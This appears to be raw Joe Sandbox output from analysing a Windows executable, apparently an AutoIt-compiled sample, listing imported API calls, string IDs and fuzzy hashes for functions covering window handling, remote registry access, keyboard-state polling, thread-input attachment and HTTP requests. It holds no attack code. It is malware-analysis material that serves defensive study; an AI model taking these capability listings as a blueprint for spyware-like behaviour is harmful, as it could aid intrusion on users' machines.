                                    Similarity
                                    • API ID: SendString$_wcslen
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 007E5CE2
                                    • GetWindowRect.USER32(00000000,?), ref: 007E5CFB
                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007E5D59
                                    • GetDlgItem.USER32(?,00000002), ref: 007E5D69
                                    • GetWindowRect.USER32(00000000,?), ref: 007E5D7B
                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 007E5DCF
                                    • GetDlgItem.USER32(?,000003E9), ref: 007E5DDD
                                    • GetWindowRect.USER32(00000000,?), ref: 007E5DEF
                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 007E5E31
                                    • GetDlgItem.USER32(?,000003EA), ref: 007E5E44
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007E5E5A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007E5E67
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    APIs
                                      • Part of subcall function 00798F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00798BE8,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 00798FC5
                                    • DestroyWindow.USER32(?), ref: 00798C81
                                    • KillTimer.USER32(00000000,?,?,?,?,00798BBA,00000000,?), ref: 00798D1B
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 007D6973
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 007D69A1
                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00798BBA,00000000,?), ref: 007D69B8
                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00798BBA,00000000), ref: 007D69D4
                                    • DeleteObject.GDI32(00000000), ref: 007D69E6
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 641708696-0
                                    APIs
                                      • Part of subcall function 00799944: GetWindowLongW.USER32(?,000000EB), ref: 00799952
                                    • GetSysColor.USER32(0000000F), ref: 00799862
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,007CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 007E9717
                                    • LoadStringW.USER32(00000000,?,007CF7F8,00000001), ref: 007E9720
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,007CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 007E9742
                                    • LoadStringW.USER32(00000000,?,007CF7F8,00000001), ref: 007E9745
                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 007E9866
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 747408836-2268648507
                                    APIs
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007E07A2
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007E07BE
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007E07DA
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007E0804
                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 007E082C
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007E0837
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007E083C
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 323675364-22481851
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00803C5C
                                    • CoInitialize.OLE32(00000000), ref: 00803C8A
                                    • CoUninitialize.OLE32 ref: 00803C94
                                    • _wcslen.LIBCMT ref: 00803D2D
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00803DB1
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00803ED5
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00803F0E
                                    • CoGetObject.OLE32(?,00000000,0081FB98,?), ref: 00803F2D
                                    • SetErrorMode.KERNEL32(00000000), ref: 00803F40
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00803FC4
                                    • VariantClear.OLEAUT32(?), ref: 00803FD8
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                    • String ID:
                                    • API String ID: 429561992-0
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 007F7AF3
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007F7B8F
                                    • SHGetDesktopFolder.SHELL32(?), ref: 007F7BA3
                                    • CoCreateInstance.OLE32(0081FD08,00000000,00000001,00846E6C,?), ref: 007F7BEF
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007F7C74
                                    • CoTaskMemFree.OLE32(?,?), ref: 007F7CCC
                                    • SHBrowseForFolderW.SHELL32(?), ref: 007F7D57
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007F7D7A
                                    • CoTaskMemFree.OLE32(00000000), ref: 007F7D81
                                    • CoTaskMemFree.OLE32(00000000), ref: 007F7DD6
                                    • CoUninitialize.OLE32 ref: 007F7DDC
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                    • String ID:
                                    • API String ID: 2762341140-0
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00815504
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00815515
                                    • CharNextW.USER32(00000158), ref: 00815544
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00815585
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0081559B
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008155AC
                                    Similarity
                                    • API ID: MessageSend$CharNext
                                    • String ID:
                                    • API String ID: 1350042424-0
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007DFAAF
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 007DFB08
                                    • VariantInit.OLEAUT32(?), ref: 007DFB1A
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 007DFB3A
                                    • VariantCopy.OLEAUT32(?,?), ref: 007DFB8D
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 007DFBA1
                                    • VariantClear.OLEAUT32(?), ref: 007DFBB6
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 007DFBC3
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007DFBCC
                                    • VariantClear.OLEAUT32(?), ref: 007DFBDE
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007DFBE9
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 007E9CA1
                                    • GetAsyncKeyState.USER32(000000A0), ref: 007E9D22
                                    • GetKeyState.USER32(000000A0), ref: 007E9D3D
                                    • GetAsyncKeyState.USER32(000000A1), ref: 007E9D57
                                    • GetKeyState.USER32(000000A1), ref: 007E9D6C
                                    • GetAsyncKeyState.USER32(00000011), ref: 007E9D84
                                    • GetKeyState.USER32(00000011), ref: 007E9D96
                                    • GetAsyncKeyState.USER32(00000012), ref: 007E9DAE
                                    • GetKeyState.USER32(00000012), ref: 007E9DC0
                                    • GetAsyncKeyState.USER32(0000005B), ref: 007E9DD8
                                    • GetKeyState.USER32(0000005B), ref: 007E9DEA
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 008005BC
                                    • inet_addr.WSOCK32(?), ref: 0080061C
                                    • gethostbyname.WSOCK32(?), ref: 00800628
                                    • IcmpCreateFile.IPHLPAPI ref: 00800636
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008006C6
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008006E5
                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 008007B9
                                    • WSACleanup.WSOCK32 ref: 008007BF
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    APIs
                                    Similarity
                                    • API ID: _wcslen$BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 707087890-567219261
                                    APIs
                                    • CoInitialize.OLE32 ref: 00803774
                                    • CoUninitialize.OLE32 ref: 0080377F
                                    • CoCreateInstance.OLE32(?,00000000,00000017,0081FB78,?), ref: 008037D9
                                    • IIDFromString.OLE32(?,?), ref: 0080384C
                                    • VariantInit.OLEAUT32(?), ref: 008038E4
                                    • VariantClear.OLEAUT32(?), ref: 00803936
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 636576611-1287834457
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007F33CF
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007F33F0
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-3080491070
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                    • API String ID: 1256254125-769500911
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F53A0
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007F5416
                                    • GetLastError.KERNEL32 ref: 007F5420
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 007F54A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    APIs
                                    • CreateMenu.USER32 ref: 00813C79
                                    • SetMenu.USER32(?,00000000), ref: 00813C88
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00813D10
                                    • IsMenu.USER32(?), ref: 00813D24
                                    • CreatePopupMenu.USER32 ref: 00813D2E
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00813D5B
                                    • DrawMenuBar.USER32 ref: 00813D63
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                    • String ID: 0$F
                                    • API String ID: 161812096-3044882817
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00813A9D
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00813AA0
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00813AC7
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00813AEA
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00813B62
                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00813BAC
                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00813BC7
                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00813BE2
                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00813BF6
                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00813C13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow
                                    • String ID:
                                    • API String ID: 312131281-0
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 007EB151
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB165
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 007EB16C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB17B
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007EB18D
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB1A6
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB1B8
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB1FD
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB212
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007EA1E1,?,00000001), ref: 007EB21D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    APIs
                                    • _free.LIBCMT ref: 007B2C94
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007B2CA0
                                    • _free.LIBCMT ref: 007B2CAB
                                    • _free.LIBCMT ref: 007B2CB6
                                    • _free.LIBCMT ref: 007B2CC1
                                    • _free.LIBCMT ref: 007B2CCC
                                    • _free.LIBCMT ref: 007B2CD7
                                    • _free.LIBCMT ref: 007B2CE2
                                    • _free.LIBCMT ref: 007B2CED
                                    • _free.LIBCMT ref: 007B2CFB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00781459
                                    • OleUninitialize.OLE32(?,00000000), ref: 007814F8
                                    • UnregisterHotKey.USER32(?), ref: 007816DD
                                    • DestroyWindow.USER32(?), ref: 007C24B9
                                    • FreeLibrary.KERNEL32(?), ref: 007C251E
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007C254B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007F7FAD
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F7FC1
                                    • GetFileAttributesW.KERNEL32(?), ref: 007F7FEB
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007F8005
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8017
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8060
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007F80B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile
                                    • String ID: *.*
                                    • API String ID: 769691225-438819550
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00785C7A
                                      • Part of subcall function 00785D0A: GetClientRect.USER32(?,?), ref: 00785D30
                                      • Part of subcall function 00785D0A: GetWindowRect.USER32(?,?), ref: 00785D71
                                      • Part of subcall function 00785D0A: ScreenToClient.USER32(?,?), ref: 00785D99
                                    • GetDC.USER32 ref: 007C46F5
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007C4708
                                    • SelectObject.GDI32(00000000,00000000), ref: 007C4716
                                    • SelectObject.GDI32(00000000,00000000), ref: 007C472B
                                    • ReleaseDC.USER32(?,00000000), ref: 007C4733
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007C47C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007F35E4
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • LoadStringW.USER32(00852390,?,00000FFF,?), ref: 007F360A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LoadString$_wcslen
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 4099089115-2391861430
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007FC272
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007FC29A
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007FC2CA
                                    • GetLastError.KERNEL32 ref: 007FC322
                                    • SetEvent.KERNEL32(?), ref: 007FC336
                                    • InternetCloseHandle.WININET(00000000), ref: 007FC341
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007C3AAF,?,?,Bad directive syntax error,0081CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007E98BC
                                    • LoadStringW.USER32(00000000,?,007C3AAF,?), ref: 007E98C3
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007E9987
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString_wcslen
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 858772685-4153970271
                                    APIs
                                    • GetParent.USER32 ref: 007E20AB
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 007E20C0
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007E214D
                                    Strings
                                    Similarity
                                    • API ID: ClassMessageNameParentSend
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1290815626-3381328864
                                    • Opcode ID: 954ef4df995a81e7c7b6adb950c1f5b0ed06fca05b05a62dd2ccea9e28410c38
                                    • Instruction ID: 9b76620359578d74fe1927c8f218649999d0c4ddcb6bfc58756ad9cc7c600fa9
                                    • Opcode Fuzzy Hash: 954ef4df995a81e7c7b6adb950c1f5b0ed06fca05b05a62dd2ccea9e28410c38
                                    • Instruction Fuzzy Hash: EF11E7766C470EBAF60122259C0ADEA379CEF59724F204116F604E51E3FABD59025614
                                    APIs
                                    Similarity
                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 1282221369-0
                                    • Opcode ID: 3f3ab831096e855e14d2466cdc1a8329b5b4a62c2e13f2f6846b48cb715ba659
                                    • Instruction ID: fcc4a50561682fa6e87b73760c1982911850c15150cc4305bd75f76111c9dbb7
                                    • Opcode Fuzzy Hash: 3f3ab831096e855e14d2466cdc1a8329b5b4a62c2e13f2f6846b48cb715ba659
                                    • Instruction Fuzzy Hash: EC611972905301EFDB22AFB49889BFD7BA5EF05310F0486ADF944A7282E63D9D019B50
